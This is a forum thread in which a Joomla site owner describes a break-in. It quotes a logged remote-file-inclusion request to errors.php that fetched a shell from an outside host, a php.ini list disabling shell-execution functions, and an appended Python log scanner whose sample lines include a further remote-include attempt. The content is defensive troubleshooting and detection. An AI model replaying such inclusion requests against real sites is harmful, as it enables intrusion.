
How do I stop the hackers??

  • How do I stop the hackers??

    Posted 15 years 9 months ago
    • Hi

      Does anybody have any ideas how I can stop a website from being hacked? It seems that every man and his mother can walk onto the webspace and drop whatever they want on me! The latest was somebody who decided to rip an Italian DVD onto the space and leave it for all his wee friends to come along and upload.

      Once I pointed out to my hosting company that I have no interest in Italian DVDs, they promptly removed it and advised how the site was hacked.

      On the logs, it showed

      xxxxxx.co.uk 21x.1x1.6x.18x - - [16/Jul/2008:05:57:02 +0100] "GET /errors.php?error=http://xxxxxx.com/cms/test.txt?? HTTP/1.1" 200 1229 "-" "Mozilla/4.61 (Macintosh; I; PPC)"

      Looks like someone was able to inject a shell through the 'error' variable, but for the life of me I do not know how I'm supposed to lock "errors.php" down to stop any more intruders....or which errors.php for that matter!

      My php.ini file is looking like this at the moment...

      memory_limit = 32m
      max_execution_time = 3600
      allow_url_fopen = Off
      allow_url_fopen = 0
      register_globals = Off
      register_globals = 0
      disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
      magic_quotes_gpc = 1
      magic_quotes_gpc = On
      safe_mode = 1
      safe_mode = On


      Can anybody offer any guidance as to what else I can add to php.ini or how I can lock down errors.php so that nobody else can walk onto this webspace and leave their rubbish behind.

      The website is built around Bentobox template on Joomla 1.0.15, with JCE and Xplorer as the only obvious additions.

      My host is monitoring the site for me but I'd rather just lock everything down and not have to worry about it!

      Any guidance or info appreciated!

      Thanks

      Kevin
  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
    • I can honestly tell you that this isn't a template issue but an issue with Joomla, and more so the configuration which your hosting provider have for php.
      I'm a rookie when it comes to php, but I can say check that your hosting provider is running PHP5, and also check that your site meets Joomla's guidelines for the optimum php settings.
      You'll probably get some far better advice if you asked this question in the www.joomla.org forum, as there are probably others who have had this same problem.
    • Debug Bar - for IE ¦ Firebug - for FireFox

      In the end you will only be remembered for what you have done with the time that you have had.
  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
    • Cardin & Mike

      Sorry for not replying earlier - for some reason I didn't get notified that anybody had replied to my post.

      My hoster is running PHP5 and it complies nicely with Joomla expectations...however the php.ini is standard as in it's blank!
      The php.ini file I'm now using is from the link that Mike provided...like him, I ended up there the first time I was hacked! Reading through that section, it's a real eye-opener to the things I was NOT doing after I have installed Joomla, be it from a clean install or from a Rocketlauncher install. I would recommend any Joomla user go there and check it out!

      The php.ini I have looks pretty sound to me but I'm no expert!! I was told that the latest hack was via "errors.php" and I have no idea if that is something I can lock down with php.ini or is it something more involved that I need to look into.

      Of course I could go to Joomla.org and ask this question...but I'm asking here because the solution to my problem may help other users of RocketTheme who get hacked...or who want to avoid that wee bit of pleasure!

      I'm going to go over to the Joomla security link again to see if I've missed anything but if anybody knows anything about locking down errors.php please let me know!

      Cheers for now

      Kevin
      Inverness
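
Added example, not part of the thread or any poster's code: a Python scan over access-log lines in the format quoted in the first post, flagging requests where a query-string parameter carries an absolute URL (the pattern in the `error=` request) and reporting the virtual host and script path so the affected errors.php can be located. The function name and the second and third sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format with a leading virtual-host field, as in the quoted line.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter whose value is itself an absolute URL is the remote-include signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_include_attempts(lines):
    """Return one record per query parameter whose decoded value is a URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        script, _, query = m['target'].partition('?')
        for pair in query.split('&'):
            name, _, value = pair.partition('=')
            value = unquote(value)  # catches http%3A%2F%2F... as well
            if REMOTE_RE.match(value):
                hits.append({
                    'vhost': m['vhost'], 'client': m['client'],
                    'time': m['time'], 'script': script,
                    'param': name, 'value': value,
                    # 200 means the script answered, not that the include worked
                    'status': m['status'],
                })
    return hits

# First line is the redacted entry from the post; the other two are constructed.
SAMPLE = [
    'xxxxxx.co.uk 21x.1x1.6x.18x - - [16/Jul/2008:05:57:02 +0100] '
    '"GET /errors.php?error=http://xxxxxx.com/cms/test.txt?? HTTP/1.1" '
    '200 1229 "-" "Mozilla/4.61 (Macintosh; I; PPC)"',
    'site.example 192.0.2.10 - - [16/Jul/2008:06:01:10 +0100] '
    '"GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'site.example 203.0.113.7 - - [16/Jul/2008:06:03:44 +0100] '
    '"GET /components/errors.php?error=HTTP%3A%2F%2Fhost.example%2Fa.txt HTTP/1.1" '
    '404 310 "-" "-"',
]

if __name__ == '__main__':
    for hit in find_remote_include_attempts(SAMPLE):
        print(hit['time'], hit['vhost'], hit['script'], hit['param'],
              hit['value'], hit['status'])
```

The `script` field of each hit gives the path of the file that received the request, which is the one to inspect and restrict.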
